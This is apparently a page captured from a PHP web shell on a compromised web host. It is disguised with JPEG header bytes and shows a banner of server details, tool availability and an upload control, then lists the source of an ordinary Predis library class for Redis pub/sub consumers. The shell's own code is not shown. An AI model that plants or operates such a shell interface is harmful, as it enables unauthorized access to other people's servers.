����JFIF��x�x����'
Server IP : 66.29.137.217 / Your IP : 3.16.130.16 Web Server : LiteSpeed System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : gltevjme ( 1095) PHP Version : 7.0.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/gltevjme/bofirmacademy.com/vendor/predis/predis/src/PubSub/ |
Upload File : |
<?php

/*
 * This file is part of the Predis package.
 *
 * (c) 2009-2020 Daniele Alessandri
 * (c) 2021-2023 Till Krüss
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

namespace Predis\PubSub;

use Iterator;
use ReturnTypeWillChange;

/**
 * Base implementation of a PUB/SUB consumer abstraction based on PHP iterators.
 *
 * Concrete consumers provide the transport by implementing disconnect(),
 * writeRequest() and getValue(); this class tracks the subscription state in
 * a small bit field and exposes the Iterator protocol on top of it.
 */
abstract class AbstractConsumer implements Iterator
{
    public const SUBSCRIBE = 'subscribe';
    public const UNSUBSCRIBE = 'unsubscribe';
    public const PSUBSCRIBE = 'psubscribe';
    public const PUNSUBSCRIBE = 'punsubscribe';
    public const MESSAGE = 'message';
    public const PMESSAGE = 'pmessage';
    public const PONG = 'pong';

    public const STATUS_VALID = 1;       // 0b0001
    public const STATUS_SUBSCRIBED = 2;  // 0b0010
    public const STATUS_PSUBSCRIBED = 4; // 0b0100

    /**
     * Iteration counter returned by key(); left unset (null) until the first
     * successful call to next().
     */
    protected $position;

    /**
     * Bit field combining the STATUS_* constants.
     */
    protected $statusFlags = self::STATUS_VALID;

    /**
     * Stops the consumer by dropping the connection when the object is
     * destroyed.
     */
    public function __destruct()
    {
        $this->stop(true);
    }

    /**
     * Checks if every bit of the specified flag is set in the status flags of
     * the consumer.
     *
     * @param int $value Flag.
     *
     * @return bool
     */
    protected function isFlagSet($value)
    {
        return ($this->statusFlags & $value) === $value;
    }

    /**
     * Subscribes to the specified channels.
     *
     * @param string ...$channel One or more channel names.
     */
    public function subscribe($channel /* , ... */)
    {
        // The first parameter stays mandatory (non-variadic) so the public
        // signature is unchanged; func_get_args() picks up any extra channels.
        $this->writeRequest(self::SUBSCRIBE, func_get_args());
        $this->statusFlags |= self::STATUS_SUBSCRIBED;
    }

    /**
     * Unsubscribes from the specified channels.
     *
     * The status flags are not modified by this method.
     *
     * @param string ...$channel Zero or more channel names.
     */
    public function unsubscribe(...$channel)
    {
        $this->writeRequest(self::UNSUBSCRIBE, $channel);
    }

    /**
     * Subscribes to the specified channels using a pattern.
     *
     * @param string ...$pattern One or more channel name patterns.
     */
    public function psubscribe(...$pattern)
    {
        $this->writeRequest(self::PSUBSCRIBE, $pattern);
        $this->statusFlags |= self::STATUS_PSUBSCRIBED;
    }

    /**
     * Unsubscribes from the specified channels using a pattern.
     *
     * The status flags are not modified by this method.
     *
     * @param string ...$pattern Zero or more channel name patterns.
     */
    public function punsubscribe(...$pattern)
    {
        $this->writeRequest(self::PUNSUBSCRIBE, $pattern);
    }

    /**
     * PING the server with an optional payload that will be echoed as a
     * PONG message in the pub/sub loop.
     *
     * The payload is always forwarded as the single command argument, even
     * when it is null.
     *
     * @param string $payload Optional PING payload.
     */
    public function ping($payload = null)
    {
        $this->writeRequest('PING', [$payload]);
    }

    /**
     * Closes the context by unsubscribing from all the subscribed channels. The
     * context can be forcefully closed by dropping the underlying connection.
     *
     * @param bool $drop Indicates if the context should be closed by dropping the connection.
     *
     * @return bool Returns false when the consumer is not valid or when the
     *              connection has been dropped, true when the unsubscribe
     *              requests have been issued.
     */
    public function stop($drop = false)
    {
        if (!$this->valid()) {
            return false;
        }

        if ($drop) {
            $this->invalidate();
            $this->disconnect();

            return false;
        }

        // Graceful stop: only unsubscribe from the kinds of subscriptions
        // that were actually requested on this consumer.
        if ($this->isFlagSet(self::STATUS_SUBSCRIBED)) {
            $this->unsubscribe();
        }

        if ($this->isFlagSet(self::STATUS_PSUBSCRIBED)) {
            $this->punsubscribe();
        }

        return true;
    }

    /**
     * Closes the underlying connection when forcing a disconnection.
     */
    abstract protected function disconnect();

    /**
     * Writes a Redis command on the underlying connection.
     *
     * @param string $method    Command ID.
     * @param array  $arguments Arguments for the command.
     */
    abstract protected function writeRequest($method, $arguments);

    /**
     * Does nothing: the consumer cannot be rewound.
     *
     * @return void
     */
    #[ReturnTypeWillChange]
    public function rewind()
    {
        // NOOP
    }

    /**
     * Returns the last message payload retrieved from the server and generated
     * by one of the active subscriptions.
     *
     * @return array
     */
    #[ReturnTypeWillChange]
    public function current()
    {
        return $this->getValue();
    }

    /**
     * Returns the current iteration counter.
     *
     * @return int|null
     */
    #[ReturnTypeWillChange]
    public function key()
    {
        return $this->position;
    }

    /**
     * Advances the iteration counter, but only while the consumer is valid.
     *
     * @return int|null The (possibly unchanged) iteration counter.
     */
    #[ReturnTypeWillChange]
    public function next()
    {
        if ($this->valid()) {
            ++$this->position;
        }

        return $this->position;
    }

    /**
     * Checks if the consumer is still in a valid state to continue, that is
     * the STATUS_VALID flag is set together with at least one of the
     * subscription flags.
     *
     * @return bool
     */
    #[ReturnTypeWillChange]
    public function valid()
    {
        $isValid = $this->isFlagSet(self::STATUS_VALID);
        $subscriptionFlags = self::STATUS_SUBSCRIBED | self::STATUS_PSUBSCRIBED;
        $hasSubscriptions = ($this->statusFlags & $subscriptionFlags) > 0;

        return $isValid && $hasSubscriptions;
    }

    /**
     * Resets the state of the consumer by clearing every status flag.
     */
    protected function invalidate()
    {
        $this->statusFlags = 0; // 0b0000
    }

    /**
     * Waits for a new message from the server generated by one of the active
     * subscriptions and returns it when available.
     *
     * @return array
     */
    abstract protected function getValue();
}